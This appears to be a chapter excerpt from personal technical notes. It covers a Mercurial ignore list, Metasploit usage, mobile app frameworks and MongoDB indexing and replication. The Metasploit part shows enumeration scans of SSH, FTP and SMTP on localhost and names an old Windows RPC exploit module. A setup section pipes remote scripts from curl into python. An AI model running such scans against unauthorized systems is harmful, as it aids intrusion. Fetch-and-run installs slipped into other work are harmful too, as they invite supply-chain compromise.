.pydevproject
.project
.DS_Store
.idea

syntax: glob

.logs/*
.settings/*
captcha/*
django/*
test_*.py
test.py
temp.py
settings_override.py
*Thumbs.db
Debug
*.pyc
*~
*.py~
*.html~
*.svn
.directory
.#*
#*
*.db
*.bat
*.sh
*.orig
*.~

32.2 Plugins

32.2.1 Hg edit history plugin

http://mercurial.selenic.com/wiki/HisteditExtension

CHAPTER 33

Metasploit

Contents:

33.1 Tips

33.1.1 Configure db

# service postgresql start

# adduser msf
# passwd msf
root@local:/# su - postgres
postgres@local:~$ psql
postgres=# CREATE DATABASE msf;
postgres=# CREATE USER msf WITH PASSWORD 'msf';
postgres=# GRANT ALL PRIVILEGES ON DATABASE msf to msf;
root@local:/# msfconsole
msf > db_status
[*] postgresql selected, no connection

msf > db_connect msf:msf@127.0.0.1:5432/msf
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf
msf > search ftp
msf > db_rebuild_cache
[*] Purging and rebuilding the module cache in the background...
msf >

33.1.2 SSH Username Enumeration

msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ssh_enumusers) > set USER_FILE /home/msf/user_list
USER_FILE => /home/msf/user_list
msf auxiliary(ssh_enumusers) > run

[*] 127.0.0.1:22 - SSH - Checking for false positives
[*] 127.0.0.1:22 - SSH - Starting scan
[+] 127.0.0.1:22 - SSH - User 'root' found
[+] 127.0.0.1:22 - SSH - User 'admin' found
[!] 127.0.0.1:22 - SSH - User 'administrator' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

33.1.3 Anonymous FTP Access Detection

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
msf auxiliary(anonymous) > run

[+] 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 2.2.2) 220 Ready)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

33.1.4 FTP Version Scanner

msf > use auxiliary/scanner/ftp/ftp_version

33.1.5 SMTP User Enumeration Utility

msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set RHOSTS 127.0.0.1
msf auxiliary(smtp_enum) > run

[*] 127.0.0.1 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(smtp_enum) > set RHOSTS 127.0.0.2
msf auxiliary(smtp_enum) > run

[+] 127.0.0.2:25 Users found: , postmaster
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

33.1.6 SMTP Open Relay Detection

msf > use auxiliary/scanner/smtp/smtp_relay

33.1.7 SMTP Banner Grabber

msf > use auxiliary/scanner/smtp/smtp_version

33.1.8 MS03-026 Microsoft RPC DCOM Interface Overflow

msf > use exploit/windows/dcerpc/ms03_026_dcom

This module exploits a stack buffer overflow in the RPCSS service. This vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003, all in one request :)

http://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms03_026_dcom
https://community.rapid7.com/community/metasploit/blog/2013/03/12/exploit-popularity-contest

33.1.9 Docker file

# install setup tools
curl https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py | python -
# install pip
curl -L https://raw.github.com/pypa/pip/master/contrib/get-pip.py | python -
# install python-dev
aptitude install python-dev gcc


CHAPTER 34

Mobile Programming

Contents:

34.1 Tips

Frameworks Comparison
• Wiki: Multiple Phone Web-based
• Mobile Frameworks Comparison Chart

Frameworks
• jQuery Mobile (Wiki: jQuery Mobile)
• jQTouch
• Sencha Touch
• PhoneGap (Wiki: PhoneGap)
• Cordova

Platform (Rendering Engine)
• iOS (Webkit)
• Android (Webkit)
• Windows Mobile (Trident)
• Windows Phone (Trident)
• Blackberry OS (Webkit)
• Symbian (Webkit/Gecko)
• MeeGo (Gecko)
• (Gecko)


• WebOS (Webkit)
• Bada (Webkit)
• Java ME

Mobile Target
• Mobile website: a mobile website is technically the same as a regular website except that its size is adjusted to the smaller screen. It has an adaptive layout.
• WebApp: a WebApp is like a regular mobile website, but it behaves and is used like a native app. The user interface looks like a native app, but the technologies used are those of the web.
• Native app: a native app is created for a specific platform and uses the required technologies, such as a specific SDK or development language.
• Hybrid app: a hybrid app is a WebApp that is compiled into a native app. Additional native features can be added to the WebApp, which is then distributed as a native app.

Ebooks
Building Android Apps with HTML, CSS, and JavaScript: Making Native Apps with Standards-Based Web Tools

34.1.1 Push notification

https://firebase.google.com/docs/cloud-messaging/
http://openpush.im/
https://docs.pusher.com/push-notifications/android/configure-fcm
https://documentation.onesignal.com/docs
https://pushy.me/docs/api/send-notifications

34.2 Sencha Touch

34.2.1 Native Packaging for Mobile Devices

Native Packaging

34.2.2 Creating a New Application

Using Sencha Cmd with Sencha Touch:

omidraha@debian:$ cd ~/Tools/js/Sencha/SenchaTouch/touch-2.3.0
omidraha@debian:$ sencha generate app helloTouch /home/omidraha/Prj/Sencha/Touch/helloTouch/

34.2.3 Deploying Your Application

omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app build testing
omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app build production
omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app build native
omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app package run config.json


# sudo ln -s /home/omidraha/bin/Sencha/Cmd/4.0.0.203/stbuild/
# cp -R /home/omidraha/bin/Sencha/Cmd/4.0.0.203/stbuild/st-res/ ~/Prj/Sencha/Touch/helloTouch

34.3 Android

34.3.1 Get the Android SDK http://developer.android.com/sdk/index.html

34.3.2 Android NDK http://developer.android.com/tools/sdk/ndk/index.html

34.3.3 API Level

API Level

34.3.4 Using adb command

root@debian:/path/to/android_sdk/adt-bundle-linux-x86-20131030/sdk/platform-tools# ./adb push /path/of/file/in/pc/file.zip /path/of/file/in/mobile/new_file.zip
root@debian:/path/to/android_sdk/adt-bundle-linux-x86-20131030/sdk/platform-tools# ./adb shell

Android Virtual Devices (AVDs)

http://www.techotopia.com/index.php/Android_4_App_Development_Essentials

To change the screen orientation on the emulator, use Ctrl-F11.
Android introduced fragments in Android 3.0 (API level 11).

http://developer.android.com/training/multiscreen/screensizes.html
http://developer.android.com/guide/components/fragments.html
http://developer.android.com/tools/support-library/features.html#v7-appcompat
http://developer.android.com/training/basics/actionbar/index.html
http://stackoverflow.com/questions/20720667/where-is-the-option-to-add-a-new-preference-screen-in-android-studio-0-4-0

34.3.5 Using Android in Eclipse

https://dl-ssl.google.com/android/eclipse

Click Help. Select Install New Software. This will open the Available Software screen, with a list of your available software from the repository you have selected.
Click the "Add" button, located to the right of the "Work with" field. Clicking this button will open the "Add Repository" dialog box. Here you will enter the information to download the ADT plugin.
In the "Name" field, enter "ADT Plugin". In the "Location" field, enter "https://dl-ssl.google.com/android/eclipse/". Click OK.
Check the "Developer Tools" box. Click Next to display the list of tools that will be downloaded. Click Next again to open the license agreements. Read them and then click Finish.
You may get a warning that the validity of the software cannot be established. It is OK to ignore this warning.

34.3.6 Force Android RTL

http://android-developers.blogspot.com/2013/03/native-rtl-support-in-android-42.html
https://developer.android.com/about/versions/jelly-bean.html#42-native-rtl
https://developer.android.com/reference/android/view/View.html#attr_android:layoutDirection
https://developer.android.com/reference/android/view/View.html#attr_android:textDirection
https://developer.android.com/reference/android/view/View.html#attr_android:textAlignment
https://developer.android.com/reference/android/text/TextUtils.html#getLayoutDirectionFromLocale%28java.util.Locale%29

34.3.7 Before Using Android IDE

$ sudo apt-get install lib32z1 lib32ncurses5 lib32stdc++6

34.3.8 List of custom Android distributions

https://en.wikipedia.org/wiki/List_of_custom_Android_distributions
https://www.geckoandfly.com/23320/custom-rom-firmware-android-smartphones/

34.4 Kivy

34.4.1 Using kivy

$ git clone git://github.com/kivy/python-for-android

$ cd python-for-android

$ export ANDROIDSDK="/path/to/Android/sdk"
$ export ANDROIDNDK="/path/to/Android/android-ndk-r10d"
$ export ANDROIDNDKVER=r10d
$ export ANDROIDAPI=14
$ export PATH=$ANDROIDNDK:$ANDROIDSDK/platform-tools:$ANDROIDSDK/tools:$PATH

$ ./distribute.sh -m "openssl pil kivy"

$ cd dist/default



$ ./build.py --package org.test.touchtracer --name touchtracer --version 1.0 --dir /path/to/android/demo/touchtracer debug

$ ./build.py --package org.test.touchtracer --name touchtracer --version 1.0 --dir /path/to/android/demo/touchtracer release

34.4.2 Ebook

Creating Apps in Kivy

34.4.3 Resources http://kivy.org/docs/api-kivy.html

34.4.4 RTL support issues https://groups.google.com/forum/#!msg/kivy-users/Isjopdt7HQM/pZU5KcQRLkkJ https://github.com/kivy/kivy/issues/1570 https://github.com/kivy/kivy/issues/1619 https://github.com/kivy/kivy/pull/1739 https://github.com/kivy/kivy/pull/1614

34.4.5 APK big size issues

http://stackoverflow.com/questions/23464540/size-of-apk-when-coded-with-kivy-compared-to-the-one-in-java https://github.com/kivy/python-for-android/issues/202

34.5 Flutter https://flutter.io/ https://github.com/flutter/flutter

34.5.1 Flutter's high performance compared with React Native and native apps

• Compiles to Native Code
• No reliance on OEM widgets
• No bridge needed
• Structural Repainting

https://medium.com/@nhancv/why-i-move-to-flutter-34c4005b96ef


34.5.2 Native apps (Java/Swift)

How native Android/iOS code interacts with the platform

Your app talks to the platform to create widgets, or access services like the camera. The widgets are rendered to a screen canvas, and events are passed back to the widgets. This is a simple architecture, but you pretty much have to create separate apps for each platform because the widgets are different, not to mention the native languages.

34.5.3 React Native apps (Javascript)

How React Native interacts with the platform


React Native is very popular (and deserves to be), but because the JavaScript realm accesses the OEM widgets in the native realm, it has to go through the bridge for those as well. Widgets are typically accessed quite frequently (up to 60 times a second during animations, transitions, or when the user "swipes" something on the screen with their finger), so this can cause performance problems. As one article about React Native puts it: Here lies one of the main keys to understanding React Native performance. Each realm by itself is blazingly fast. The performance bottleneck often occurs when we move from one realm to the other. In order to architect performant React Native apps, we must keep passes over the bridge to a minimum.

34.5.4 Flutter apps (Dart)

How Flutter interacts with the platform

Flutter takes a different approach to avoiding the performance problems caused by the need for a JavaScript bridge: it uses a compiled programming language, namely Dart. Dart is compiled "ahead of time" (AOT) into native code for multiple platforms. This allows Flutter to communicate with the platform without going through a JavaScript bridge that does a context switch. Flutter has a new architecture that includes widgets that look and feel good, are fast, and are customizable and extensible. That's right, Flutter does not use the OEM widgets (or DOM WebViews); it provides its own widgets. Flutter moves the widgets and the renderer from the platform into the app, which allows them to be customizable and extensible. All that Flutter requires of the platform is a canvas in which to render the widgets so they can appear on the device screen, and access to events (touches, timers, etc.) and services (location, camera, etc.).

https://hackernoon.com/why-native-app-developers-should-take-a-serious-look-at-flutter-e97361a1c073

CHAPTER 35

MongoDB

Contents:

35.1 Indexes

35.1.1 Unique Indexes

Unique indexes enforce uniqueness across all their entries. Thus if you try to insert a document into this book’s sample application’s users collection with an already indexed username value, then the insert will fail with the following exception:

E11000 duplicate key error index: gardening.users.$username_1 dup key:{: "kbanker"}

When creating a unique index on a collection that already contains data, you run the risk of failure, since it's possible that duplicate keys may already exist in the collection. When duplicate keys exist, the index creation fails. If you do find yourself needing to create a unique index on an established collection, you have a couple of options. The first is to repeatedly attempt to create the unique index and use the failure messages to manually remove the documents with duplicate keys. But if the data isn't so important, you can also instruct the database to drop documents with duplicate keys automatically using the dropDups option. To take an example, if your users collection already contains data, and if you don't care that documents with duplicate keys are removed, then you can issue the index creation command like this:

db.users.ensureIndex({username: 1}, {unique: true, dropDups: true})

35.1.2 Sparse Indexes

Indexes are dense by default. This means that for every document in an indexed collection, there will be a corresponding entry in the index even if the document lacks the indexed key. So for each document without the indexed key, there will still be a null entry in the index.


In a sparse index, only those documents having some value for the indexed key will appear. If you want to create a sparse index, all you have to do is specify {sparse: true}. So for example, you can create a unique, sparse index on sku like so:

db.products.ensureIndex({sku: 1}, {unique: true, sparse: true})

35.1.3 Create Indexes, Drop Indexes , Get Indexes Info

> use sample
> db.users.insert({username: 'ali', 'uid': 1})

> spec = {"ns": "sample.users", "key": {"uid": 1}, "name": "uid_1"}
> db.system.indexes.insert(spec, true)

> db.system.indexes.find()
{ "v" : 1, "key" : { "_id" : 1 }, "ns" : "sample.users", "name" : "_id_" }
{ "v" : 1, "key" : { "uid" : 1 }, "ns" : "sample.users", "name" : "uid_1" }

> db.runCommand({'deleteIndexes': 'users', index: 'uid_1'})
{ "nIndexesWas" : 2, "ok" : 1 }
> db.system.indexes.find()
{ "v" : 1, "key" : { "_id" : 1 }, "ns" : "sample.users", "name" : "_id_" }

> db.users.ensureIndex({uid: 1})
> db.system.indexes.find()
{ "v" : 1, "key" : { "_id" : 1 }, "ns" : "sample.users", "name" : "_id_" }
{ "v" : 1, "key" : { "uid" : 1 }, "ns" : "sample.users", "name" : "uid_1" }

> db.users.getIndexSpecs()
[
    { "v" : 1, "key" : { "_id" : 1 }, "ns" : "sample.users", "name" : "_id_" },
    { "v" : 1, "key" : { "uid" : 1 }, "ns" : "sample.users", "name" : "uid_1" }
]

> db.users.dropIndex("uid_1")
{ "nIndexesWas" : 2, "ok" : 1 }


35.1.4 Building Indexes

The index builds in two steps. In the first step, the values to be indexed are sorted. A sorted data set makes for a much more efficient insertion into the B-tree. Note that the progress of the sort is indicated by the ratio of the number of documents sorted to the total number of documents:

[conn1] building new index on { open: 1.0, close: 1.0 } for stocks.values
1000000/4308303 23%
2000000/4308303 46%
3000000/4308303 69%
4000000/4308303 92%
Tue Jan 4 09:59:13 [conn1] external sort used : 5 files in 55 secs

For step two, the sorted values are inserted into the index. Progress is indicated in the same way, and when complete, the time it took to complete the index build is indicated as the insert time into system.indexes:

1200300/4308303 27%
2227900/4308303 51%
2837100/4308303 65%
3278100/4308303 76%
3783300/4308303 87%
4075500/4308303 94%
Tue Jan 4 10:00:16 [conn1] done building bottom layer, going to commit
Tue Jan 4 10:00:16 [conn1] done for 4308303 records 118.942 secs
Tue Jan 4 10:00:16 [conn1] insert stocks.system.indexes 118942ms

In addition to examining the MongoDB log, you can check the index build progress by running the shell’s currentOp() method:

> db.currentOp()
{
    "inprog" : [
        {
            "opid" : 58,
            "active" : true,
            "lockType" : "write",
            "waitingForLock" : false,
            "secs_running" : 55,
            "op" : "insert",
            "ns" : "stocks.system.indexes",
            "query" : {},
            "client" : "127.0.0.1:53421",
            "desc" : "conn",
            "msg" : "index: (1/3) external sort 3999999/4308303 92%"
        }
    ]
}

The last field, msg, describes the build's progress. Note also the lockType, which indicates that the index build takes a write lock. This means that no other client can read or write from the database at this time. If you're running in production, this is obviously a bad thing, and it's the reason why long index builds can be so vexing.


35.1.5 Background indexing

If you’re running in production and can’t afford to halt access to the database, you can specify that an index be built in the background. Although the index build will still take a write lock, the job will yield to allow other readers and writers to access the database. If your application typically exerts a heavy load on MongoDB, then a background index build will degrade performance, but this may be acceptable under certain circumstances. For example, if you know that the index can be built within a time window where application traffic is at a minimum, then background indexing in this case might be a good choice. To build an index in the background, specify {background: true} when you declare the index. The previous index can be built in the background like so: db.values.ensureIndex({open:1, close:1},{background: true})

35.1.6 Offline indexing

If your production data set is too large to be indexed within a few hours, then you’ll need to make alternate plans. This will usually involve taking a replica node offline, building the index on that node by itself, and then allowing the node to catch up with the master replica. Once it’s caught up, you can promote the node to primary and then take another secondary offline and build its version of the index. This tactic presumes that your replication oplog is large enough to prevent the offline node from becoming stale during the index build.

35.1.7 Backups

Because indexes are hard to build, you may want to back them up. Unfortunately, not all backup methods include indexes. For instance, you might be tempted to use mongodump and mongorestore, but these utilities preserve col- lections and index declarations only. This means that when you run mongorestore, all the indexes declared for any collections you’ve backed up will be re-created. As always, if your data set is large, the time it takes to build these indexes may be unacceptable.

35.1.8 The order of fields in an index

• Equality Tests: add all equality-tested fields to the compound index, in any order.
• Sort Fields (ascending/descending only matters if there are multiple sort fields): add sort fields to the index in the same order and direction as your query's sort.
• Range Filters: first, add the range filter for the field with the lowest cardinality (fewest distinct values in the collection), then the next lowest-cardinality range filter, and so on to the highest cardinality.

http://emptysqua.re/blog/optimizing-mongodb-compound-indexes/

The order of fields in an index should be:
• First, fields on which you will query for exact values.
• Second, fields on which you will sort.
• Finally, fields on which you will query for a range of values.

http://blog.mongolab.com/2012/06/cardinal-ins/
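As a hedged illustration of this rule (the orders collection, its fields, and the values are hypothetical, and the pre-3.0 ensureIndex helper is used to match the rest of this chapter): a query with an equality test on status, a sort on created_at, and a range filter on amount would use an index ordered status, created_at, amount.

$ mongo --quiet --eval '
    // equality field first, then the sort field, then the range field
    db.orders.ensureIndex({status: 1, created_at: -1, amount: 1});
    db.orders.find({status: "processed", amount: {$gt: 100}})
             .sort({created_at: -1})
             .forEach(printjson);
'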


35.1.9 Covered query

An index covers a query (a covered query) when:
• all the fields in the query are part of that index, and
• all the fields returned in the documents that match the query are in the same index.

For these queries, MongoDB does not need to inspect documents outside of the index, which is often more efficient than inspecting entire documents.
Example: Given a collection inventory with the following index on the type and item fields:

{ type:1, item:1}

This index will cover the following query on the type and item fields, which returns only the item field:

db.inventory.find({type: "food", item: /^c/}, {item: 1, _id: 0})

However, this index will not cover the following query, which returns the item field and the _id field:

db.inventory.find({type: "food", item: /^c/}, {item: 1})

http://docs.mongodb.org/manual/core/read-operations/#covering-a-query

35.1.10 Selectivity index

Selectivity is the ability of a query to narrow results using the index. Effective indexes are more selective and allow MongoDB to use the index for a larger portion of the work associated with fulfilling the query. To ensure selectivity, write queries that limit the number of possible documents with the indexed field. Write queries that are appropriately selective relative to your indexed data. Suppose you have a field called status where the possible values are new and processed. If you add an index on status you’ve created a low-selectivity index. The index will be of little help in locating records. A better strategy, depending on your queries, would be to create a compound index that includes the low-selectivity field and another field. For example, you could create a compound index on status and created_at. Another option, again depending on your use case, might be to use separate collections, one for each status. http://docs.mongodb.org/manual/tutorial/create-queries-that-ensure-selectivity/

35.1.11 Use Indexes to Sort Query Results

For the fastest performance when sorting query results by a given field, create a sorted index on that field. To sort query results on multiple fields, create a compound index. MongoDB sorts results based on the field order in the index. For queries that include a sort that uses a compound index, ensure that all fields before the first sorted field are equality matches. Example If you create the following index:

{ a:1, b:1, c:1, d:1}

The following query and sort operations can use the index:


db.collection.find().sort({a: 1})
db.collection.find().sort({a: 1, b: 1})
db.collection.find({a: 4}).sort({a: 1, b: 1})
db.collection.find({b: 5}).sort({a: 1, b: 1})
db.collection.find({a: 5}).sort({b: 1, c: 1})
db.collection.find({a: 5, c: 4, b: 3}).sort({d: 1})
db.collection.find({a: {$gt: 4}}).sort({a: 1, b: 1})
db.collection.find({a: {$gt: 5}}).sort({a: 1, b: 1})
db.collection.find({a: 5, b: 3, d: {$gt: 4}}).sort({c: 1})
db.collection.find({a: 5, b: 3, c: {$lt: 2}, d: {$gt: 4}}).sort({c: 1})

However, the following queries cannot sort the results using the index:

db.collection.find().sort({b: 1})
db.collection.find({b: 5}).sort({b: 1})

Note: For in-memory sorts that do not use an index, the sort() operation is significantly slower. The sort() operation will abort when it uses 32 megabytes of memory. http://docs.mongodb.org/manual/tutorial/sort-results-with-indexes/

35.2 Queries

35.2.1 Identifying slow queries

It’s safe to assume that for most apps, queries shouldn’t take much longer than 100 milliseconds. The MongoDB logger has this assumption ingrained, since it prints a warning whenever any operation, including a query, takes more than 100 ms. The logs, therefore, are the first place you should look for slow queries. grep -E '([0-9])+ms' mongod.log

35.2.2 .explain()

For indexed queries, nscanned is the number of index keys in the range that Mongo scanned, and nscannedObjects is the number of documents it looked at to get to the final result. nscannedObjects includes at least all the documents returned, even if Mongo could tell just by looking at the index that the document was definitely a match. Thus, you can see that nscanned >= nscannedObjects >= n always. For simple queries you want the three numbers to be equal. It means you’ve created the ideal index and Mongo is using it. http://emptysqua.re/blog/optimizing-mongodb-compound-indexes/ http://docs.mongodb.org/manual/reference/method/cursor.explain/


35.2.3 When mongo queries plan expired

The optimizer automatically expires a plan after any of the following events:
• 100 writes are made to the collection.
• Indexes are added or removed from the collection.
• The reIndex command rebuilds the index.
• The mongod process restarts.
• A query using a cached query plan does a lot more work than expected. Here, what qualifies as "a lot more work" is a value for nscanned exceeding the cached nscanned value by at least a factor of 10.
• Every time a query runs 1,000 or so times, MongoDB checks to see if the selected query plan is still the best one.

http://esampaio.com/post/understanding-mongodb-query-plans
http://docs.mongodb.org/manual/core/read-operations/#query-optimization

35.2.4 Query Operations that Cannot Use Indexes Effectively

Some query operations cannot use indexes effectively or cannot use indexes at all. Consider the following situations: The inequality operators $nin and $ne are not very selective, as they often match a large portion of the index. As a result, in most cases, a $nin or $ne query with an index may perform no better than a $nin or $ne query that must scan all documents in a collection. Queries that specify regular expressions, with inline JavaScript regular expressions or $regex operator expressions, cannot use an index. However, the regular expression with anchors to the beginning of a string can use an index. http://docs.mongodb.org/manual/core/read-operations/#query-operations-that-cannot-use-indexes-effectively

35.3 Collections

35.3.1 Capped collection

Capped collections guarantee that insertion order and natural order are identical.
http://docs.mongodb.org/manual/reference/glossary/#term-natural-order
Capped collections are circular, fixed-size collections that keep documents well-ordered, even without the use of an index. This means that capped collections can receive very high-speed writes and sequential reads. These collections are particularly useful for keeping log files but are not limited to that purpose. Use capped collections where appropriate.
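A capped collection is created explicitly with a fixed size, for example (a sketch; the collection name and limits are illustrative):

$ mongo --quiet --eval '
    // 1 MB capped collection holding at most 5000 documents
    db.createCollection("app_log", {capped: true, size: 1048576, max: 5000});
'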

35.3.2 Use Natural Order for Fast Reads

To return documents in the order they exist on disk, return sorted operations using the $natural operator. On a capped collection, this also returns the documents in the order in which they were written. Natural order does not use indexes but can be fast for operations when you want to select the first or last items on disk. http://docs.mongodb.org/manual/core/capped-collections/
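For example, the most recently written documents of such a collection can be read newest-first like this (reusing the hypothetical app_log collection from the sketch above):

$ mongo --quiet --eval '
    db.app_log.find().sort({$natural: -1}).limit(10).forEach(printjson);
'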


35.4 Sharding http://blog.mongodb.org/post/47633823714/new-hash-based-sharding-feature-in-mongodb-2-4

35.5 Memory

35.5.1 Working set

The working set for a MongoDB database is the portion of your data that clients access most often. You can estimate the size of the working set using the workingSet document in the output of serverStatus. To return serverStatus with the workingSet document, issue a command in one of the following forms:

db.runCommand({serverStatus: 1, workingSet: 1})
db.serverStatus({workingSet: 1})

Your working set should stay in memory to achieve good performance. Otherwise many random disk IO’s will occur, and unless you are using SSD, this can be quite slow. http://docs.mongodb.org/manual/faq/diagnostics/#what-is-working-set-and-how-can-i-estimate-it-s-size

35.5.2 Must my working set size fit RAM?

Your working set should stay in memory to achieve good performance. Otherwise many random disk IO's will occur, and unless you are using SSD, this can be quite slow. One area to watch specifically in managing the size of your working set is index access patterns. If you are inserting into indexes at random locations (as would happen with id's that are randomly generated by hashes), you will continually be updating the whole index. If instead you are able to create your id's in approximately ascending order (for example, day concatenated with a random id), all the updates will occur at the right side of the b-tree and the working set size for index pages will be much smaller. It is fine if databases and thus virtual size are much larger than RAM.

35.5.3 How do I calculate how much RAM I need for my application?

The amount of RAM you need depends on several factors, including but not limited to:
• The relationship between database storage and working set.
• The operating system's cache strategy for LRU (Least Recently Used).
• The impact of journaling.
• The number or rate of page faults and other MMS gauges to detect when you need more RAM.

MongoDB defers to the operating system when loading data into memory from disk. It simply memory maps all its data files and relies on the operating system to cache data. The OS typically evicts the least-recently-used data from RAM when it runs low on memory. For example, if clients access indexes more frequently than documents, then indexes will more likely stay in RAM, but it depends on your particular usage.
To calculate how much RAM you need, you must calculate your working set size, or the portion of your data that clients use most often. This depends on your access patterns, what indexes you have, and the size of your documents. If page faults are infrequent, your working set fits in RAM. If fault rates rise higher than that, you risk performance degradation. This is less critical with SSD drives than with spinning disks.


35.5.4 How do I read memory statistics in the UNIX top command

Because mongod uses memory-mapped files, the memory statistics in top require interpretation in a special way. On a large database, VSIZE (virtual bytes) tends to be the size of the entire database. If the mongod doesn’t have other processes running, RSIZE (resident bytes) is the total memory of the machine, as this counts file system cache contents. For Linux systems, use the vmstat command to help determine how the system uses memory. On OS X systems use vm_stat. http://docs.mongodb.org/manual/faq/diagnostics/#must-my-working-set-size-fit-ram

35.5.5 Ensure Indexes Fit RAM

For the fastest processing, ensure that your indexes fit entirely in RAM so that the system can avoid reading the index from disk. To check the size of your indexes, use the db.collection.totalIndexSize() helper, which returns data in bytes:

> db.collection.totalIndexSize() 4294976499

The above example shows an index size of almost 4.3 gigabytes. To ensure this index fits in RAM, you must not only have more than that much RAM available but also must have RAM available for the rest of the working set. Also remember: If you have and use multiple collections, you must consider the size of all indexes on all collections. The indexes and the working set must be able to fit in memory at the same time.

35.5.6 Indexes that Hold Only Recent Values in RAM

Indexes do not have to fit entirely into RAM in all cases. If the value of the indexed field increments with every insert, and most queries select recently added documents; then MongoDB only needs to keep the parts of the index that hold the most recent or “right-most” values in RAM. This allows for efficient index use for read and write operations and minimize the amount of RAM required to support the index. http://docs.mongodb.org/manual/tutorial/ensure-indexes-fit-ram/

35.6 Errors

https://github.com/mongodb/mongo/blob/master/docs/errors.md

35.7 ReplicaSet

http://blog.mongodb.org/post/53841037541/real-time-profiling-a-mongodb-cluster

MongoDB provides two flavors of replication: master-slave replication and replica sets. For both, a single primary node receives all writes, and then all secondary nodes read and apply those writes to themselves asynchronously. Master-slave replication and replica sets use the same replication mechanism, but replica sets additionally ensure automated failover: if the primary node goes offline for any reason, then one of the secondary nodes will automatically be promoted to primary, if possible. Replica sets provide other enhancements too, such as easier recovery and more sophisticated deployment topologies.


The only time you should opt for MongoDB's master-slave replication is when you'd require more than 11 slave nodes, since a replica set can have no more than 12 members.
In addition to protecting against external failures, replication has been important for MongoDB in particular for durability. When running without journaling enabled, MongoDB's data files aren't guaranteed to be free of corruption in the event of an unclean shutdown. Without journaling, replication must always be run to guarantee a clean copy of the data files if a single node shuts down hard.
Of course, replication is desirable even when running with journaling. After all, you still want high availability and fast failover. In this case, journaling expedites recovery because it allows you to bring failed nodes back online simply by replaying the journal. This is much faster than resyncing from an existing replica or copying a replica's data files manually.
Journaled or not, MongoDB's replication greatly increases the reliability of the overall database deployments and is highly recommended.
Replicas aren't a replacement for backups. A backup represents a snapshot of the database at a particular time in the past, whereas a replica is always up to date.

35.7.1 Scaling reads with secondaries isn’t practical if any of the following apply

1. The allotted hardware can't process the given workload. As an example, if your working data set is much larger than the available RAM, then sending random reads to the secondaries is still likely to result in excessive disk access, and thus slow queries.
2. The ratio of writes to reads exceeds 50%. This is an admittedly arbitrary ratio, but it's a reasonable place to start. The issue here is that every write to the primary must eventually be written to all the secondaries as well. Therefore directing reads to secondaries that are already processing a lot of writes can sometimes slow the replication process and may not result in increased read throughput.
3. The application requires consistent reads. Secondary nodes replicate asynchronously and therefore aren't guaranteed to reflect the latest writes to the primary node. In pathological cases, secondaries can run hours behind.

35.7.2 Configure a Delayed Replica Set Member

To configure a delayed secondary member, set its priority value to 0, its hidden value to true, and its slaveDelay value to the number of seconds to delay.

cfg = rs.conf()
cfg.members[0].priority = 0
cfg.members[0].hidden = true
cfg.members[0].slaveDelay = 3600
rs.reconfig(cfg)

The length of the secondary slaveDelay must fit within the window of the oplog. If the oplog is shorter than the slaveDelay window, the delayed member cannot successfully replicate operations. After the replica set reconfigures, the delayed secondary member cannot become primary and is hidden from applications. http://docs.mongodb.org/manual/tutorial/configure-a-delayed-replica-set-member/ http://docs.mongodb.org/manual/core/replica-set-delayed-member/

35.7.3 Replica sets Setup

The minimum recommended replica set configuration consists of three nodes. Two of these nodes serve as first-class, persistent mongod instances.


Either can act as the replica set primary, and both have a full copy of the data. The third node in the set is an arbiter, which doesn't replicate data, but merely acts as a kind of neutral observer. As the name suggests, the arbiter arbitrates: when failover is required, the arbiter helps to elect a new primary node.
Start by creating a data directory for each replica set member:

mkdir /data/mongo-sample/node1
mkdir /data/mongo-sample/node2
mkdir /data/mongo-sample/arbiter

Next, start each member as a separate mongod. Since you'll be running each process on the same machine, it's probably easiest to start each mongod in a separate terminal window:

mongod --replSet myapp --dbpath /data/mongo-sample/node1 --port 40000
mongod --replSet myapp --dbpath /data/mongo-sample/node2 --port 40001
mongod --replSet myapp --dbpath /data/mongo-sample/arbiter --port 40002

If you examine the mongod log output, the first thing you'll notice are error messages saying that the configuration can't be found. This is completely normal:

Sun Jul 14 09:58:55.576 [initandlisten] allocator: tcmalloc
Sun Jul 14 09:58:55.576 [initandlisten] options: { dbpath: "/data/mongo-sample/node1", port: 4000, replSet: "myapp" }
Sun Jul 14 09:58:55.651 [FileAllocator] allocating new datafile /data/mongo-sample/node1/local.ns, filling with zeroes...
Sun Jul 14 09:58:55.651 [FileAllocator] creating directory /data/mongo-sample/node1/_tmp
Sun Jul 14 09:58:55.706 [FileAllocator] done allocating datafile /data/mongo-sample/node1/local.ns, size: 16MB, took 0.022 secs
Sun Jul 14 09:58:55.707 [FileAllocator] allocating new datafile /data/mongo-sample/node1/local.0, filling with zeroes...
Sun Jul 14 09:58:55.729 [FileAllocator] done allocating datafile /data/mongo-sample/node1/local.0, size: 16MB, took 0.022 secs
Sun Jul 14 09:58:55.734 [initandlisten] waiting for connections on port 4000
Sun Jul 14 09:58:55.734 [websvr] admin web console waiting for connections on port 5000
Sun Jul 14 09:58:55.739 [rsStart] replSet can't get local.system.replset config from self or any seed (EMPTYCONFIG)
Sun Jul 14 09:58:55.739 [rsStart] replSet info you may need to run replSetInitiate -- rs.initiate() in the shell -- if that is not already done
Sun Jul 14 09:59:05.739 [rsStart] replSet can't get local.system.replset config from self or any seed (EMPTYCONFIG)
Sun Jul 14 09:59:15.739 [rsStart] replSet can't get local.system.replset config from self or any seed (EMPTYCONFIG)

